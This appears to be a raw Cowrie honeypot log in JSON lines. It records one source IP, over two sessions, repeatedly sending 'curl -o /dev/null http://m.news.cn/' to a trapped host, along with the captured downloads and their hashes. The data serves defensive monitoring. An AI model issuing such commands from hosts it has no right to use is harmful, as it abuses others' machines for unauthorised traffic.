{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.980237Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.984543Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.985162Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.004978Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.015406Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.016108Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.020107Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.022362Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.023103Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.033477Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.035477Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.057624Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.058527Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.066689Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.067366Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.094879Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.095671Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.106586Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.107380Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.132991Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.133774Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.144676Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.145876Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.146446Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.171140Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.171862Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.175049Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.177393Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.183074Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.183691Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.190134Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.210373Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.211270Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.222041Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.222779Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.225334Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.237987Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.248628Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.249396Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.259960Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.260667Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.268512Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.274310Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.275493Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.282445Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.288089Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.290370Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.293746Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.294555Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.302551Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.303559Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.308104Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.314350Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.331155Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.332464Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.333323Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.338306Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.345182Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.346920Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.350604Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.351407Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.369608Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.370377Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.388356Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.389063Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.400972Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.408060Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.408713Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.425719Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.426787Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.427722Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.443964Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.444987Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.445594Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.469568Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.470334Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.480365Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.481145Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.484277Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.491977Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.493969Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.507611Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.508460Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.517646Z","src_ip":"212.227.125.160","session":"7541ed730449"}
